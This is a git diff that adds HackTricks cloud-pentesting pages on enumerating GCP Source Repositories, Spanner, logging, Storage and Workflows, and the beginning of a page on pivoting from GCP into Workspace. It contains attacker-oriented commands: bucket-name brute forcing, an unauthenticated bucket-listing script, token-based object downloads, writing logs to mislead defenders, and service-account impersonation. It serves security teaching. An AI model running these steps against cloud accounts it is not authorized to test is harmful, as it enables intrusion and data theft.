+* **VPC Service Controls**: Security perimeters that provide additional layers of protection to resources and services hosted in Google Cloud's Virtual Private Cloud (VPC), preventing data exfiltration and providing granular access control.
+* **Access Context Manager**: Part of Google Cloud's BeyondCorp Enterprise, this tool helps define and enforce fine-grained access control policies based on a user's identity and the context of their request, such as device security status, IP address, and more.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
new file mode 100644
index 0000000000..764278ceaa
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md
@@ -0,0 +1,95 @@
+# GCP - Source Repositories Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
+
+Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code.
+
+Key features of Cloud Source Repositories include:
+
+1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows.
+2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment.
+3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles.
+4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices.
+5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews.
+6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories.
+
+### OffSec information <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
+
+* The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background.
+* To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**.
+* You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms).
+* It's possible to **code & debug from inside GCP**.
+* By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled.
+
+### Open In Cloud Shell
+
+It's possible to open the repository in Cloud Shell, a prompt like this one will appear:
+
+<figure><img src="../../../.gitbook/assets/image (325).png" alt=""><figcaption></figcaption></figure>
+
+This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised).
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Repos enumeration
+gcloud source repos list #Get names and URLs
+gcloud source repos describe <repo_name>
+gcloud source repos get-iam-policy <repo_name>
+
+# gcloud repo clone
+gcloud source repos clone <REPO NAME>
+gcloud source repos get-iam-policy <REPO NAME>
+... git add & git commit -m ...
+git push --set-upstream origin master
+git push -u origin master
+
+# Access via git
+## To add a SSH key go to https://source.cloud.google.com/user/ssh_keys (no gcloud command)
+git clone ssh://username@domain.com@source.developers.google.com:2022/p/<proj-name>/r/<repo-name>
+git add, commit, push...
+```
+{% endcode %}
+
+### Privilege Escalation & Post Exploitation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-sourcerepos-privesc.md" %}
+[gcp-sourcerepos-privesc.md](../gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Enum
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md" %}
+[gcp-source-repositories-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md
new file mode 100644
index 0000000000..7f69215985
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md
@@ -0,0 +1,57 @@
+# GCP - Spanner Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
+
+Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
+
+```bash
+# Cloud Spanner
+## Instances
+gcloud spanner instances list
+gcloud spanner instances describe <INSTANCE>
+gcloud spanner instances get-iam-policy <INSTANCE>
+
+## Databases
+gcloud spanner databases list --instance <INSTANCE>
+gcloud spanner databases describe --instance <INSTANCE> <db_name>
+gcloud spanner databases get-iam-policy --instance <INSTANCE> <db_name>
+gcloud spanner databases execute-sql --instance <INSTANCE> --sql <sql> <db_name> 
+
+## Backups
+gcloud spanner backups list --instance <INSTANCE>
+gcloud spanner backups get-iam-policy --instance <INSTANCE> <backup_name>
+
+## Instance Configs
+gcloud spanner instance-configs list
+gcloud spanner instance-configs describe <name>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
new file mode 100644
index 0000000000..1e9390a4e4
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md
@@ -0,0 +1,59 @@
+# GCP - Stackdriver Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## [Stackdriver logging](https://cloud.google.com/sdk/gcloud/reference/logging/)
+
+[**Stackdriver**](https://cloud.google.com/stackdriver/) is recognized as a comprehensive infrastructure **logging suite** offered by Google. It has the capability to capture sensitive data through features like syslog, which reports individual commands executed inside Compute Instances. Furthermore, it monitors HTTP requests sent to load balancers or App Engine applications, network packet metadata within VPC communications, and more.
+
+For a Compute Instance, the corresponding service account requires merely **WRITE** permissions to facilitate logging of instance activities. Nonetheless, it's possible that an administrator might **inadvertently** provide the service account with both **READ** and **WRITE** permissions. In such instances, the logs can be scrutinized for sensitive information.
+
+To accomplish this, the [gcloud logging](https://cloud.google.com/sdk/gcloud/reference/logging/) utility offers a set of tools. Initially, identifying the types of logs present in your current project is recommended.
+
+```bash
+# List logs
+gcloud logging logs list
+
+# Read logs
+gcloud logging read [FOLDER]
+
+# Write logs
+# An attacker writing logs may confuse the Blue Team
+gcloud logging write [FOLDER] [MESSAGE]
+
+# List Buckets
+gcloud logging buckets list
+```
+
+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
+* [https://initblog.com/2020/gcp-post-exploitation/](https://initblog.com/2020/gcp-post-exploitation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md
new file mode 100644
index 0000000000..03e35e3e8c
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md
@@ -0,0 +1,181 @@
+# GCP - Storage Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Storage
+
+Google Cloud Platform (GCP) Storage is a **cloud-based storage solution** that provides highly durable and available object storage for unstructured data. It offers **various storage classes** based on performance, availability, and cost, including Standard, Nearline, Coldline, and Archive. GCP Storage also provides advanced features such as **lifecycle policies, versioning, and access control** to manage and secure data effectively.
+
+The bucket can be stored in a region, in 2 regions or **multi-region (default)**.
+
+### Storage Types
+
+* **Standard Storage**: This is the default storage option that **offers high-performance, low-latency access to frequently accessed data**. It is suitable for a wide range of use cases, including serving website content, streaming media, and hosting data analytics pipelines.
+* **Nearline Storage**: This storage class offers **lower storage costs** and **slightly higher access costs** than Standard Storage. It is optimized for infrequently accessed data, with a minimum storage duration of 30 days. It is ideal for backup and archival purposes.
+* **Coldline Storage**: This storage class is optimized for **long-term storage of infrequently accessed data**, with a minimum storage duration of 90 days. It offers the **lower storage costs** than Nearline Storage, but with **higher access costs.**
+* **Archive Storage**: This storage class is designed for cold data that is accessed **very infrequently**, with a minimum storage duration of 365 days. It offers the **lowest storage costs of all GCP storage options** but with the **highest access costs**. It is suitable for long-term retention of data that needs to be stored for compliance or regulatory reasons.
+* **Autoclass**: If you **don't know how much you are going to access** the data you can select Autoclass and GCP will **automatically change the type of storage for you to minimize costs**.
+
+### Access Control
+
+By **default** it's **recommended** to control the access via **IAM**, but it's also possible to **enable the use of ACLs**.\
+If you select to only use IAM (default) and **90 days passes**, you **won't be able to enable ACLs** for the bucket.
+
+### Versioning
+
+It's possible to enable versioning, this will **save old versions of the file inside the bucket**. It's possible to configure the **number of versions you want to keep** and even **how long** you want **noncurrent** versions (old versions) to live. Recommended is **7 days for Standard type**.
+
+The **metadata of a noncurrent version is kept**. Moreover, **ACLs of noncurrent versions are also kept**, so older versions might have different ACLs from the current version.
+
+Learn more in the [**docs**](https://cloud.google.com/storage/docs/object-versioning).
+
+### Retention Policy
+
+Indicate how **long** you want to **forbid the deletion of Objects inside the bucket** (very useful for compliance at least).\
+Only one of **versioning or retention policy can be enabled at the same time**.
+
+### Encryption
+
+By default objects are **encrypted using Google managed keys**, but you could also use a **key from KMS**.
+
+### Public Access
+
+It's possible to give **external users** (logged in GCP or not) **access to buckets content**.\
+By default, when a bucket is created, it will have **disabled the option to expose publicly** the bucket, but with enough permissions the can be changed.
+
+The **format of an URL** to access a bucket is **`https://storage.googleapis.com/<bucket-name>` or `https://<bucket_name>.storage.googleapis.com`** (both are valid).
+
+### HMAC Keys
+
+An HMAC key is a type of _credential_ and can be **associated with a service account or a user account in Cloud Storage**. You use an HMAC key to create _signatures_ which are then included in requests to Cloud Storage. Signatures show that a **given request is authorized by the user or service account**.
+
+HMAC keys have two primary pieces, an _access ID_ and a _secret_.
+
+*   **Access ID**: An alphanumeric string linked to a specific service or user account. When linked to a service account, the string is 61 characters in length, and when linked to a user account, the string is 24 characters in length. The following shows an example of an access ID:
+
+    `GOOGTS7C7FUP3AIRVJTE2BCDKINBTES3HC2GY5CBFJDCQ2SYHV6A6XXVTJFSA`
+*   **Secret**: A 40-character Base-64 encoded string that is linked to a specific access ID. A secret is a preshared key that only you and Cloud Storage know. You use your secret to create signatures as part of the authentication process. The following shows an example of a secret:
+
+    `bGoa+V7g/yqDXvKRqq+JTFn4uQZbPiQJo4pf9RzJ`
+
+Both the **access ID and secret uniquely identify an HMAC key**, but the secret is much more sensitive information, because it's used to **create signatures**.
+
+### Enumeration
+
+```bash
+# List all storage buckets in project
+gsutil ls
+
+# Get each bucket configuration (protections, CLs, times, configs...)
+gsutil ls -L
+
+# List contents of a specific bucket
+gsutil ls gs://bucket-name/
+gsutil ls -r gs://bucket-name/ # Recursive
+gsutil ls -a gs://bucket-name/ # Get ALL versions of objects
+
+# Cat the context of a file without copying it locally
+gsutil cat 'gs://bucket-name/folder/object'
+gsutil cat 'gs://bucket-name/folder/object#<num>' # cat specific version
+
+# Copy an object from the bucket to your local storage for review
+gsutil cp gs://bucket-name/folder/object ~/
+
+# List using a raw OAuth token
+## Useful because "CLOUDSDK_AUTH_ACCESS_TOKEN" and "gcloud config set auth/access_token_file" doesn't work with gsutil
+curl -H "Authorization: Bearer $TOKEN" "https://storage.googleapis.com/storage/v1/b/<storage-name>/o"
+# Download file content from bucket
+curl -H "Authorization: Bearer $TOKEN" "https://storage.googleapis.com/storage/v1/b/supportstorage-58249/o/flag.txt?alt=media" --output -
+
+# Enumerate HMAC keys
+gsutil hmac list
+
+# Get permissions
+gcloud storage buckets get-iam-policy gs://bucket-name/
+gcloud storage objects get-iam-policy gs://bucket-name/folder/object
+```
+
+If you get a permission denied error listing buckets you may still have access to the content. So, now that you know about the name convention of the buckets you can generate a list of possible names and try to access them:
+
+```bash
+for i in $(cat wordlist.txt); do gsutil ls -r gs://"$i"; done
+```
+
+With permissions `storage.objects.list` and `storage.objects.get`, you should be able to enumerate all folders and files from the bucket in order to download them. You can achieve that with this Python script:
+
+```python
+import requests
+import xml.etree.ElementTree as ET
+
+def list_bucket_objects(bucket_name, prefix='', marker=None):
+    url = f"https://storage.googleapis.com/{bucket_name}?prefix={prefix}"
+    if marker:
+        url += f"&marker={marker}"
+    response = requests.get(url)
+    xml_data = response.content
+    root = ET.fromstring(xml_data)
+    ns = {'ns': 'http://doc.s3.amazonaws.com/2006-03-01'}
+    for contents in root.findall('.//ns:Contents', namespaces=ns):
+        key = contents.find('ns:Key', namespaces=ns).text
+        print(key)
+    next_marker = root.find('ns:NextMarker', namespaces=ns)
+    if next_marker is not None:
+        next_marker_value = next_marker.text
+        list_bucket_objects(bucket_name, prefix, next_marker_value)
+
+list_bucket_objects('<storage-name>')
+```
+
+### Privilege Escalation
+
+In the following page you can check how to **abuse storage permissions to escalate privileges**:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-storage-privesc.md" %}
+[gcp-storage-privesc.md](../gcp-privilege-escalation/gcp-storage-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Enum
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/" %}
+[gcp-storage-unauthenticated-enum](../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %}
+[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-storage-persistence.md" %}
+[gcp-storage-persistence.md](../gcp-persistence/gcp-storage-persistence.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
new file mode 100644
index 0000000000..4e909b9c11
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md
@@ -0,0 +1,67 @@
+# GCP - Workflows Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+**Google Cloud Platform (GCP) Workflows** is a service that helps you automate tasks that involve **multiple steps** across Google Cloud services and other web-based services. Think of it as a way to set up a **sequence of actions** that run on their own once triggered. You can design these sequences, called workflows, to do things like process data, handle software deployments, or manage cloud resources without having to manually oversee each step.
+
+### Encryption
+
+Related to encryption, by default the **Google-managed encryption key is use**d but it's possible to make it use a key of by customers.
+
+## Enumeration
+
+{% hint style="danger" %}
+You can also check the output of previous executions to look for sensitive information
+{% endhint %}
+
+{% code overflow="wrap" %}
+```bash
+# List Workflows
+gcloud workflows list
+
+# Get info and yaml of an specific workflow
+gcloud workflows describe <workflow-name>
+
+# List executions
+gcloud workflows executions list workflow-1
+
+# Get execution info and output
+gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>
+```
+{% endcode %}
+
+### Privesc and Post Exploitation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-workflows-privesc.md" %}
+[gcp-workflows-privesc.md](../gcp-privilege-escalation/gcp-workflows-privesc.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md b/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
new file mode 100644
index 0000000000..c6354c2633
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md
@@ -0,0 +1,203 @@
+# GCP <--> Workspace Pivoting
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## **From GCP to GWS**
+
+### **Domain Wide Delegation basics**
+
+Google Workspace's Domain-Wide delegation allows an identity object, either an **external app** from Google Workspace Marketplace or an internal **GCP Service Account**, to **access data across the Workspace on behalf of users**.
+
+{% hint style="info" %}
+This basically means that **service accounts** inside GCP projects of an organization might be able to i**mpersonate Workspace users** of the same organization (or even from a different one).
+{% endhint %}
+
+For more information about how this exactly works check:
+
+{% content-ref url="gcp-understanding-domain-wide-delegation.md" %}
+[gcp-understanding-domain-wide-delegation.md](gcp-understanding-domain-wide-delegation.md)
+{% endcontent-ref %}
+
+### Compromise existing delegation
+
+If an attacker **compromised some access over GCP** and **known a valid Workspace user email** (preferably **super admin**) of the company, he could **enumerate all the projects** he has access to, **enumerate all the SAs** of the projects, check to which **service accounts he has access to**, and **repeat** all these steps with each SA he can impersonate.\
+With a **list of all the service accounts** he has **access** to and the list of **Workspace** **emails**, the attacker could try to **impersonate user with each service account**.
